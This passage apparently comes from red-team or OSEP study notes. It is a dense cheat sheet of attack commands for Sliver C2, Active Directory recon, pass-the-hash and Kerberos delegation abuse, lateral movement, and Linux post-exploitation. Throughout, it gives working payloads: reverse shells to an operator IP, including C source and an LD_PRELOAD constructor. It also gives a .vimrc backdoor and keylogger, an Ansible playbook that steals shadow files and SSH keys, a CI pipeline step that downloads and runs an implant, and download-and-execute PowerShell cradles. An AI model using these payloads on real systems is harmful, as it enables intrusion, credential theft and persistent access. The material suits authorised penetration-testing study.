Console.WriteLine($"[+] XOR-encoded dump: {dumpPath}.enc (key: 0x{key:X2})");
# Decode on operator machine
with open('debug64.dmp.enc', 'rb') as f:
    data = bytearray(f.read())
for i in range(len(data)):
    data[i] ^= 0x41
with open('debug64.dmp', 'wb') as f:
    f.write(data)

Domain Reconnaissance

Using BOFs from Sliver Armory

# Install Active Directory BOFs
sliver (IMPLANT) > armory install sa-ldapsearch
sliver (IMPLANT) > armory install sa-adcs-enum
sliver (IMPLANT) > armory install sa-enumerate

# Example LDAP searches
sliver (IMPLANT) > sa-ldapsearch "(objectCategory=user)" cn,samAccountName
sliver (IMPLANT) > sa-ldapsearch "(&(objectCategory=group)(cn=*Admins*))" cn,member

Using .NET Assemblies (ADSearch / SharpView)

# ADSearch
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "objectCategory=user"
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins*))" --attributes cn,member

# Kerberoastable users
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

# ASREPRoastable users
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,samaccountname

# Unconstrained Delegation computers
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

# Constrained Delegation computers
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

# SharpView
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-Domain
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainUser -Identity jking -Properties DisplayName,MemberOf
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainGroupMember -Identity "Domain Admins" -Recurse
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Find-LocalAdminAccess
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainTrust
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainGPO -Properties DisplayName

PowerView (via PowerShell — if CLM is bypassed)

sliver (IMPLANT) > shell
PS> IEX(New-Object Net.WebClient).DownloadString('http://<IP>/PowerView.ps1')

PS> Get-Domain
PS> Get-DomainSID
PS> Get-DomainController | select Forest, Name, OSVersion | fl
PS> Get-DomainUser -Properties DisplayName, MemberOf | fl
PS> Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberDistinguishedName
PS> Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
PS> Get-DomainTrust
PS> Find-LocalAdminAccess
PS> Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll" }

From Linux (via Sliver SOCKS pivot)

# BloodHound collection (from Linux)
$ proxychains bloodhound-python -c All -u <USER> -p '<PASSWORD>' -d <DOMAIN> -dc <DC_FQDN> -ns <DC_IP>

# Or from implant
sliver (IMPLANT) > execute-assembly /tools/SharpHound.exe -c All --outputdirectory C:\Windows\Temp
sliver (IMPLANT) > download C:\Windows\Temp\*_BloodHound.zip

# NetExec enumeration
$ proxychains nxc smb <SUBNET>/24 --gen-relay-list targets.txt
$ proxychains nxc smb <DC_IP> -u <USER> -p '<PASSWORD>' --shares
$ proxychains nxc smb <DC_IP> -u <USER> -p '<PASSWORD>' --users
$ proxychains nxc smb <DC_IP> -u <USER> -p '<PASSWORD>' --pass-pol

User Impersonation & Token Manipulation

# --- Sliver token manipulation ---

# Impersonate a user with known credentials (creates a new logon)
sliver (IMPLANT) > impersonate <DOMAIN>\\<USER>

# Make a token with creds
sliver (IMPLANT) > make-token -u <USER> -d <DOMAIN> -p '<PASSWORD>'

# Revert to original token
sliver (IMPLANT) > rev2self

# Steal token from a running process
# (Sliver doesn't have a direct steal_token — use execute-assembly with SharpToken or similar)
sliver (IMPLANT) > execute-assembly /tools/SharpToken.exe list_token
sliver (IMPLANT) > execute-assembly /tools/SharpToken.exe execute "<DOMAIN>\\<USER>" "cmd /c whoami"

# --- Pass The Hash (from Linux, via SOCKS) ---
$ proxychains netexec smb <TARGET_IP> -u <USER> -H <NTLM_HASH>
$ proxychains impacket-psexec <DOMAIN>/<USER>@<TARGET_IP> -hashes :<NTLM_HASH>
$ proxychains impacket-wmiexec <DOMAIN>/<USER>@<TARGET_IP> -hashes :<NTLM_HASH>

# --- Overpass-the-Hash (Rubeus) ---
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgt /user:<USER> /rc4:<NTLM_HASH> /nowrap
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgt /user:<USER> /aes256:<AES_HASH> /domain:<DOMAIN> /opsec /nowrap

# --- Pass The Ticket ---
# Create sacrificial logon and inject TGT
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:FakePass /ticket:<BASE64_TICKET>

Lateral Movement

From Sliver

# --- PSExec-style (requires admin + SMB access) ---

# Generate service binary
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format service --save /tmp/svc.exe

# Upload and execute via sc (manual psexec)
sliver (IMPLANT) > upload /tmp/svc.exe \\\\<TARGET>\\ADMIN$\\svc.exe
sliver (IMPLANT) > shell
cmd> sc \\<TARGET> create LegitSvc binPath= "C:\Windows\svc.exe"
cmd> sc \\<TARGET> start LegitSvc
cmd> sc \\<TARGET> delete LegitSvc

# --- WMI execution ---
sliver (IMPLANT) > shell
cmd> wmic /node:<TARGET> process call create "C:\Windows\Temp\sliver.exe"

# --- WinRM (requires port 5985/5986 open + admin access) ---
sliver (IMPLANT) > shell
PS> $s = New-PSSession -ComputerName <TARGET>
PS> Invoke-Command -Session $s -ScriptBlock { C:\Windows\Temp\sliver.exe }

# --- DCOM ---
sliver (IMPLANT) > shell
PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<TARGET>"))
PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\Temp\sliver.exe","","","7")

From Linux (via SOCKS proxy)

# PSExec (Impacket)
$ proxychains impacket-psexec <DOMAIN>/<USER>:'<PASSWORD>'@<TARGET_IP>
$ proxychains impacket-psexec <DOMAIN>/<USER>@<TARGET_IP> -hashes :<NTLM_HASH>

# WMIExec
$ proxychains impacket-wmiexec <DOMAIN>/<USER>:'<PASSWORD>'@<TARGET_IP>

# SMBExec
$ proxychains impacket-smbexec <DOMAIN>/<USER>:'<PASSWORD>'@<TARGET_IP>

# ATExec (scheduled task based)
$ proxychains impacket-atexec <DOMAIN>/<USER>:'<PASSWORD>'@<TARGET_IP> "cmd /c C:\Windows\Temp\sliver.exe"

# Evil-WinRM
$ proxychains evil-winrm -i <TARGET_IP> -u <USER> -p '<PASSWORD>'
$ proxychains evil-winrm -i <TARGET_IP> -u <USER> -H <NTLM_HASH>

Linux Post-Exploitation

Theory

After gaining a shell on a Linux host inside the target environment, OSEP requires you to escalate, persist, and move laterally. Key techniques include shared library hijacking and configuration file backdoors.

LD_PRELOAD / LD_LIBRARY_PATH Hijacking

Theory: When a binary runs, the dynamic linker loads shared libraries in order of precedence. LD_PRELOAD forces a library to load before all others, allowing function interception. LD_LIBRARY_PATH changes the library search path, letting you swap a legitimate .so with a malicious one. Both can hijack SUID binaries or services running as root.

# --- Identify vulnerable SUID binaries ---
$ find / -perm -4000 -type f 2>/dev/null
$ find / -perm -2000 -type f 2>/dev/null  # SGID too

# Check which libraries a binary loads
$ ldd /usr/bin/some_suid_binary
$ readelf -d /usr/bin/some_suid_binary | grep NEEDED

# Check if LD_PRELOAD is respected (SUID binaries ignore it UNLESS
# they use the RPATH/RUNPATH or the binary has NORELRO — rare but check)
# Better target: cron jobs or services that run as root and source env
$ cat /etc/crontab
$ systemctl list-unit-files --type=service --state=enabled

# --- Compile malicious shared library ---
# Example: hook a common function like getuid() or strcmp()
// evil.c — LD_PRELOAD payload
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Constructor runs when library is loaded
__attribute__((constructor))
void init(void) {
    // Reverse shell back to Sliver listener
    system("/bin/bash -c 'bash -i >& /dev/tcp/<OPERATOR_IP>/443 0>&1'");
}

// Or: hook a function the target binary calls
// int getuid(void) { return 0; }  // fake root
# Compile the shared library
$ gcc -shared -fPIC -o /tmp/evil.so evil.c -ldl

# --- LD_PRELOAD (if target process sources env vars) ---
# If you can edit /etc/environment, a user's .bashrc, or a service's env:
$ echo '/tmp/evil.so' >> /etc/ld.so.preload       # System-wide (needs root)
$ LD_PRELOAD=/tmp/evil.so /usr/bin/some_suid_binary  # Direct (limited)

# --- LD_LIBRARY_PATH (replace a loaded library) ---
# 1. Find a library the binary loads from a writable or missing path
$ ldd /usr/bin/target_binary | grep "not found"
# 2. Name your payload to match the missing library
$ cp /tmp/evil.so /writable/path/libmissing.so
$ LD_LIBRARY_PATH=/writable/path /usr/bin/target_binary

# --- RPATH / RUNPATH abuse ---
# If binary has RPATH pointing to a writable directory:
$ readelf -d /usr/bin/target_binary | grep -i rpath
# Drop your malicious .so in that directory with the expected name

VIM Config Backdoor / Keylogger

Theory: If a target user uses vim, you can backdoor their .vimrc to execute arbitrary code or capture keystrokes whenever they open the editor.

# --- Simple command execution on VIM startup ---
# Append to target user's .vimrc
$ echo 'silent! execute "!bash /tmp/callback.sh &"' >> /home/<USER>/.vimrc

# callback.sh — Sliver implant or reverse shell
#!/bin/bash
nohup /tmp/sliver_implant &>/dev/null &

# --- VIM keylogger (captures to file) ---
# Add to .vimrc — logs all keystrokes to a hidden file
" .vimrc keylogger
autocmd VimEnter * silent! execute '!touch /tmp/.vimlog'
autocmd InsertCharPre * silent! execute '!echo -n "' . v:char . '" >> /tmp/.vimlog'
# Simpler approach: autocmd-based payload
$ cat >> /home/<USER>/.vimrc << 'EOF'
autocmd BufWritePost * silent! execute '!bash -c "bash -i >& /dev/tcp/<OPERATOR_IP>/443 0>&1 &" 2>/dev/null'
EOF

# Retrieve logged keystrokes
$ cat /tmp/.vimlog

Building Linux Payloads in C

// simple_revshell.c — Minimal Linux reverse shell
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

int main() {
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET,
                              .sin_port = htons(443),
                              .sin_addr.s_addr = inet_addr("<OPERATOR_IP>") };
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0); dup2(s, 1); dup2(s, 2);
    execve("/bin/bash", NULL, NULL);
    return 0;
}
# Compile
$ gcc -o /tmp/revshell simple_revshell.c
# Static compile (no library dependencies, works across distros)
$ gcc -static -o /tmp/revshell simple_revshell.c

# Cross-compile from Kali for target
$ x86_64-linux-gnu-gcc -static -o revshell simple_revshell.c

Linux Lateral Movement (SSH Hijacking, Ansible, Artifactory, Kerberos)

SSH Hijacking — ControlMaster Abuse

Theory: OpenSSH's ControlMaster feature multiplexes SSH sessions over a single TCP connection. If a user has ControlMaster auto in their ~/.ssh/config, a Unix socket is created for the master connection. Any local user with access to that socket file can piggyback on the authenticated session without credentials.

# --- Identify active ControlMaster sockets ---
$ find /tmp -name 'ssh_mux*' 2>/dev/null
$ find /run -name 'ssh-*' 2>/dev/null
$ ls -la /tmp/ssh-*/
# Sockets look like: /tmp/ssh_mux_<user>@<host>:<port>

# Check the user's SSH config
$ cat /home/<USER>/.ssh/config
# Look for:
#   ControlMaster auto
#   ControlPath /tmp/ssh_mux_%r@%h:%p
#   ControlPersist 600

# --- Hijack the session (if you have same UID or root) ---
# Simply SSH to the same host — it reuses the existing authenticated socket
$ ssh -S /tmp/ssh_mux_<USER>@<TARGET>:22 <USER>@<TARGET>

# If you are root and the socket belongs to another user:
$ ssh -S /tmp/ssh_mux_admin@server2:22 -o 'ControlMaster=no' admin@server2

SSH-Agent Hijacking

Theory: When SSH agent forwarding is enabled, the remote host has access to a Unix socket connected to the user's SSH agent. If you compromise that host (or become root), you can use the agent socket to authenticate to other hosts the user has access to.

# --- Find SSH agent sockets ---
$ find /tmp -name 'agent.*' 2>/dev/null
$ ls -la /tmp/ssh-*/

# Check for agent forwarding in the SSH server config
$ grep -i 'AllowAgentForwarding' /etc/ssh/sshd_config

# --- Hijack the agent (requires root or same UID) ---
# Set the SSH_AUTH_SOCK to the target's agent socket
$ export SSH_AUTH_SOCK=/tmp/ssh-XXXXX/agent.<PID>

# List keys in the hijacked agent
$ ssh-add -l

# Now SSH to any host the user's keys grant access to
$ ssh admin@internal-server3

# --- Enumerate where the keys can go ---
# Use the hijacked agent to scan internal hosts
$ for host in $(cat internal_hosts.txt); do
    ssh -o BatchMode=yes -o ConnectTimeout=3 $host 'hostname' 2>/dev/null && echo "[+] $host accessible"
  done

SSH Agent Forwarding Abuse

# --- If you're on a jump host with agent forwarding from user A ---

# 1. List active SSH sessions (look for agent forwarding)
$ ps aux | grep 'sshd:.*@'
# 2. Check for agent sockets
$ find /tmp/ssh-* -type s -user <TARGET_USER> 2>/dev/null
# 3. Hijack it
$ SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.<PID> ssh-add -l
$ SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.<PID> ssh root@next-target

Ansible Exploitation

Theory: Ansible is a common IT automation tool. Ansible controllers store playbooks, inventories, and often credentials in cleartext or weakly protected. Compromising the Ansible controller or abusing Ansible module behavior can give you lateral movement to all managed hosts.

# --- Credential harvesting from Ansible files ---

# Find Ansible inventory (hosts/groups/credentials)
$ find / -name 'hosts' -path '*/ansible/*' 2>/dev/null
$ find / -name 'inventory*' 2>/dev/null
$ find / -name '*.yml' -path '*/ansible/*' 2>/dev/null

# Check for plaintext passwords in inventory
$ grep -ri 'ansible_password\|ansible_ssh_pass\|ansible_become_pass' /etc/ansible/ 2>/dev/null
$ grep -ri 'ansible_password\|ansible_ssh_pass' /home/*/. 2>/dev/null

# Check for Ansible Vault encrypted files
$ find / -name '*.yml' -exec grep -l 'ANSIBLE_VAULT' {} \; 2>/dev/null
# Crack vault password
$ ansible2john vault_encrypted.yml > vault.hash
$ john vault.hash --wordlist=/usr/share/wordlists/rockyou.txt

# Check group_vars and host_vars for creds
$ cat /etc/ansible/group_vars/all.yml
$ cat /etc/ansible/host_vars/<HOST>.yml

# --- Playbook Abuse (if you can edit playbooks or create new ones) ---
# Create a malicious playbook that runs on all hosts
# evil_playbook.yml — reverse shell on all managed hosts
---
- hosts: all
  become: yes
  tasks:
    - name: callback
      shell: "bash -c 'bash -i >& /dev/tcp/<OPERATOR_IP>/443 0>&1'"
      async: 10
      poll: 0
# Run it
$ ansible-playbook -i /etc/ansible/hosts evil_playbook.yml

# --- Data leakage via Ansible modules ---
# Use Ansible to read sensitive files from all hosts
# harvest_playbook.yml — grab /etc/shadow from all hosts
---
- hosts: all
  become: yes
  tasks:
    - name: grab shadow
      fetch:
        src: /etc/shadow
        dest: /tmp/loot/{{ inventory_hostname }}/
        flat: yes
    - name: grab SSH keys
      fetch:
        src: /root/.ssh/id_rsa
        dest: /tmp/loot/{{ inventory_hostname }}/
        flat: yes
# Run data harvest
$ ansible-playbook -i /etc/ansible/hosts harvest_playbook.yml
# All files end up in /tmp/loot/<hostname>/

# --- Weak permissions abuse ---
# If playbook directory is world-writable, inject into existing playbooks
$ ls -la /etc/ansible/playbooks/
# Inject a task into an existing playbook that runs on a schedule

Artifactory / CI-CD Pipeline Abuse

Theory: Artifactory (JFrog) and CI/CD pipelines like Jenkins, GitLab CI, or GitHub Actions often store credentials and have broad network access. Compromising them enables lateral movement to deployment targets.

# --- Artifactory credential theft ---
# Default config locations
$ cat /opt/jfrog/artifactory/var/etc/system.yaml
$ cat /opt/jfrog/artifactory/var/etc/access/keys/private.key

# Artifactory API tokens in environment or config
$ env | grep -i 'artifactory\|jfrog\|art_'
$ find / -name '*.properties' -exec grep -li 'password\|token\|apikey' {} \; 2>/dev/null

# Search for Jenkins credentials
$ find / -name 'credentials.xml' 2>/dev/null
$ find / -name 'secrets' -path '*/jenkins/*' 2>/dev/null
$ cat /var/lib/jenkins/secrets/master.key
$ cat /var/lib/jenkins/secrets/hudson.util.Secret

# --- Pipeline code injection ---
# If you can write to a git repo that triggers a CI pipeline:
# Add a stage that executes a reverse shell during build
# .gitlab-ci.yml or Jenkinsfile injection
stages:
  - build
build_job:
  script:
    - curl http://<OPERATOR_IP>/sliver_implant -o /tmp/implant && chmod +x /tmp/implant && /tmp/implant &
    - make build  # Original build command

Kerberos on Linux

Theory: Linux machines joined to Active Directory (via SSSD, Winbind, or realmd) use Kerberos for authentication. Keytab files store long-term keys. From a compromised Linux domain member, you can extract keytabs, request tickets, and perform Kerberos attacks using Impacket.

# --- Find keytab files ---
$ find / -name '*.keytab' 2>/dev/null
$ ls -la /etc/krb5.keytab                  # Default system keytab
$ ls -la /etc/security/keytab/             # Some distros
$ cat /etc/krb5.conf                        # Kerberos config (realm, KDC)

# --- Read keytab entries ---
$ klist -k /etc/krb5.keytab                # List principals
$ klist -ke /etc/krb5.keytab               # With encryption types

# --- Use keytab to get a TGT ---
$ kinit -kt /etc/krb5.keytab <PRINCIPAL>@<REALM>
$ klist                                     # Verify ticket

# --- Impacket with keytab ---
# Use the machine keytab for lateral movement
$ export KRB5CCNAME=/tmp/krb5cc_machine
$ impacket-getTGT -keytab /etc/krb5.keytab <REALM>/<MACHINE$>@<REALM>
$ impacket-getST -spn cifs/<TARGET_FQDN> -impersonate Administrator -dc-ip <DC_IP> <DOMAIN>/<MACHINE$> -k -no-pass
$ export KRB5CCNAME=Administrator.ccache
$ impacket-psexec -k -no-pass <TARGET_FQDN>

# --- Extract tickets from Linux credential cache ---
$ ls -la /tmp/krb5cc_*                      # ccache files per user
$ cp /tmp/krb5cc_<UID> /tmp/stolen.ccache
$ export KRB5CCNAME=/tmp/stolen.ccache
$ klist                                     # View stolen tickets
# Use with Impacket
$ impacket-psexec -k -no-pass <TARGET_FQDN>

# --- SSSD cache (hashed domain creds) ---
$ ls -la /var/lib/sss/db/
$ tdbdump /var/lib/sss/db/cache_<DOMAIN>.ldb 2>/dev/null
# May contain cached password hashes for domain users

# --- Kerberoasting from Linux ---
$ impacket-GetUserSPNs -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -request
$ hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt

# --- AS-REP Roasting from Linux ---
$ impacket-GetNPUsers -dc-ip <DC_IP> <DOMAIN>/ -usersfile users.txt -no-pass -format hashcat
$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

Pivoting & Port Forwarding (Sliver)

SOCKS Proxy

# Start SOCKS5 proxy through an implant
sliver (IMPLANT) > socks5 start

# List active SOCKS proxies
sliver > socks5

# Default listens on 127.0.0.1:1081 on the Sliver server

# Stop SOCKS proxy
sliver (IMPLANT) > socks5 stop -i <ID>

# Configure proxychains
$ sudo vim /etc/proxychains4.conf
# Add at the bottom:
socks5 127.0.0.1 1081

# Use proxychains for Linux tools
$ proxychains nmap -n -Pn -sT -p445,3389,5985 <INTERNAL_IP>
$ proxychains impacket-psexec <DOMAIN>/<USER>:'<PASS>'@<INTERNAL_IP>
$ proxychains evil-winrm -i <INTERNAL_IP> -u <USER> -p '<PASS>'

Port Forwarding

# Local port forward (access internal service from operator machine)
# Listens on Sliver server, forwards through implant to target
sliver (IMPLANT) > portfwd add --bind 127.0.0.1:8080 --remote <INTERNAL_TARGET>:80

# List active port forwards
sliver (IMPLANT) > portfwd

# Remove port forward
sliver (IMPLANT) > portfwd rm -i <ID>

# Reverse port forward (expose operator service to internal network via implant)
sliver (IMPLANT) > rportfwd add --bind 0.0.0.0:8080 --remote 127.0.0.1:80
# ^ implant listens on 8080, forwards to operator's port 80

# Example: deliver payload via rportfwd
# 1. Host payload on Sliver server port 80
# 2. Create rportfwd on implant: rportfwd add --bind 0.0.0.0:8080 --remote 127.0.0.1:80
# 3. From internal target: powershell iwr http://<IMPLANT_IP>:8080/payload.exe -OutFile ...

TCP Pivot Listener (Chain implants)

# Start a TCP pivot listener on an existing implant
sliver (IMPLANT) > pivots tcp --bind 0.0.0.0:9898

# Generate a new implant that connects to the pivot
sliver > generate --tcp-pivot <PIVOT_IMPLANT_IP>:9898 --os windows --arch amd64 --format exe --save /tmp/pivot_implant.exe

# Execute on the next-hop target — it connects back through the first implant

Chisel (Alternative — Useful when Sliver SOCKS doesn't work)

# On operator machine (server mode)
$ chisel server --reverse -p 8000

# On target (upload and run as client)
sliver (IMPLANT) > upload /tools/chisel.exe C:\Windows\Temp\ch.exe
sliver (IMPLANT) > shell
cmd> C:\Windows\Temp\ch.exe client <OPERATOR_IP>:8000 R:socks
# Creates SOCKS5 on operator:1080

# Or specific port forward
cmd> C:\Windows\Temp\ch.exe client <OPERATOR_IP>:8000 R:3389:<INTERNAL_IP>:3389

Ligolo-ng (Advanced pivoting)

# On operator (proxy mode)
$ sudo ip tuntap add user $(whoami) mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -selfcert

# On target (agent mode, upload via Sliver)
sliver (IMPLANT) > upload /tools/agent.exe C:\Windows\Temp\agent.exe
sliver (IMPLANT) > shell
cmd> C:\Windows\Temp\agent.exe -connect <OPERATOR_IP>:11601 -ignore-cert

# On operator — add route
$ sudo ip route add <INTERNAL_SUBNET>/24 dev ligolo

# Then use tools directly against internal IPs without proxychains

Kerberos Attacks

Kerberoasting

# From Sliver (Rubeus)
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe kerberoast /nowrap
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe kerberoast /user:mssql_svc /nowrap

# From Linux (via SOCKS)
$ proxychains impacket-GetUserSPNs <DOMAIN>/<USER>:'<PASSWORD>' -dc-ip <DC_IP> -request

# Crack with hashcat
$ hashcat -a 0 -m 13100 hashes.txt wordlist.txt

AS-REP Roasting

# From Sliver (Rubeus)
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asreproast /nowrap
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asreproast /user:squid_svc /nowrap

# From Linux
$ proxychains impacket-GetNPUsers <DOMAIN>/ -usersfile users.txt -dc-ip <DC_IP> -format hashcat

# Crack
$ hashcat -a 0 -m 18200 hashes.txt wordlist.txt

Unconstrained Delegation

# 1. Find unconstrained delegation computers
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

# 2. From SYSTEM on the unconstrained delegation host, dump cached TGTs
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe triage
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe dump /luid:0x14794e /nowrap
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe monitor /interval:10 /nowrap

# 3. Force authentication (PrinterBug / PetitPotam)
sliver (IMPLANT) > execute-assembly /tools/SharpSpoolTrigger.exe <DC_FQDN> <UNCONSTRAINED_HOST_FQDN>

# Or use PetitPotam from Linux:
$ proxychains python3 PetitPotam.py <UNCONSTRAINED_HOST_IP> <DC_IP>

# 4. Use captured DC machine TGT for S4U2Self
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/<DC_FQDN> /user:<DC_MACHINE$> /ticket:<BASE64_TGT> /nowrap

# 5. Inject ticket
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:Administrator /password:FakePass /ticket:<BASE64_S4U_TICKET>

Constrained Delegation

# 1. Find constrained delegation computers
sliver (IMPLANT) > execute-assembly /tools/ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

# 2. Dump the TGT of the constrained delegation computer/user
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe triage
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

# 3. S4U request (impersonate admin to the delegated service)
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/<TARGET_FQDN> /user:<MACHINE$> /ticket:<BASE64_TGT> /nowrap

# 4. Alternative service (/altservice for services not in msds-allowedtodelegateto)
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/<TARGET_FQDN> /altservice:ldap /user:<MACHINE$> /ticket:<BASE64_TGT> /nowrap

# 5. Inject and access
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:Administrator /password:FakePass /ticket:<BASE64_S4U_TICKET>

Resource-Based Constrained Delegation (RBCD)

# 1. Identify targets where you can write msDS-AllowedToActOnBehalfOfOtherIdentity
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" }

# 2. Create a fake computer account (if MachineAccountQuota > 0)
sliver (IMPLANT) > execute-assembly /tools/StandIn.exe --computer EvilPC --make
# Note the password

# 3. Compute hash of fake computer account
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe hash /password:<GENERATED_PASSWORD> /user:EvilPC$ /domain:<DOMAIN>

# 4. Set RBCD attribute on target (PowerView)
# From shell or execute-assembly
PS> $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<EVIL_COMPUTER_SID>)"
PS> $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0)
PS> Get-DomainComputer -Identity "<TARGET>" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb}

# 5. Get TGT for fake computer, then S4U
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe asktgt /user:EvilPC$ /aes256:<AES_HASH> /nowrap
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe s4u /user:EvilPC$ /impersonateuser:Administrator /msdsspn:cifs/<TARGET_FQDN> /ticket:<BASE64_TGT> /nowrap

# 6. Clean up
PS> Get-DomainComputer -Identity <TARGET> | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity

# From Linux (via Impacket):
$ proxychains impacket-rbcd -delegate-to <TARGET$> -delegate-from EvilPC$ -dc-ip <DC_IP> -action write <DOMAIN>/<USER>:'<PASS>'
$ proxychains impacket-getST -spn cifs/<TARGET_FQDN> -impersonate Administrator -dc-ip <DC_IP> <DOMAIN>/EvilPC$:'<PASS>'
$ export KRB5CCNAME=Administrator.ccache
$ proxychains impacket-psexec -k -no-pass <TARGET_FQDN>

Active Directory ACE/ACL Abuse

Theory

Active Directory objects are secured by Access Control Lists (ACLs) containing Access Control Entries (ACEs). Misconfigured ACEs can grant low-privileged users powerful rights over high-value objects (users, groups, computers, GPOs, domains). BloodHound is the primary tool for discovering exploitable ACL paths.

Enumeration

# --- BloodHound/SharpHound collection ---
sliver (IMPLANT) > execute-assembly /tools/SharpHound.exe --CollectionMethods All --OutputDirectory C:\Windows\Temp
sliver (IMPLANT) > download C:\Windows\Temp\*_BloodHound.zip
# Import into BloodHound and query for "Shortest Path to Domain Admins"

# --- Manual ACL enumeration with SharpView ---
# Find all ACEs for a specific object
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainObjectAcl -Identity <TARGET_USER_OR_GROUP> -ResolveGUIDs

# Find objects where current user has interesting rights
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Get-DomainObjectAcl -ResolveGUIDs | ? { $_.SecurityIdentifier -eq (Get-DomainUser -Identity <CURRENT_USER>).objectsid }

# From Linux via SOCKS
$ proxychains dacledit.py -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -target '<TARGET_DN>' -action read

GenericAll (Full Control)

# GenericAll on a USER → reset password, set SPN (Kerberoast), add to group
# Reset target user's password
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword 'P@ssw0rd123!'

# From Linux
$ proxychains net rpc password <TARGET_USER> 'P@ssw0rd123!' -U '<DOMAIN>/<USER>%<PASS>' -S <DC_IP>

# GenericAll on a GROUP → add yourself to the group
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Add-DomainGroupMember -Identity "Domain Admins" -Members <CURRENT_USER>

# From Linux
$ proxychains net rpc group addmem "Domain Admins" <CURRENT_USER> -U '<DOMAIN>/<USER>%<PASS>' -S <DC_IP>

# GenericAll on a COMPUTER → RBCD attack (see Kerberos section)
# Set msDS-AllowedToActOnBehalfOfOtherIdentity (same as RBCD attack flow)

GenericWrite

# GenericWrite on a USER → write any non-protected attribute
# Set a fake SPN for Kerberoasting
sliver (IMPLANT) > execute-assembly /tools/SharpView.exe Set-DomainObject -Identity <TARGET_USER> -Set @{serviceprincipalname='fake/kerberoast'}
# Then Kerberoast that user
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe kerberoast /user:<TARGET_USER> /nowrap

# Clean up — remove the fake SPN
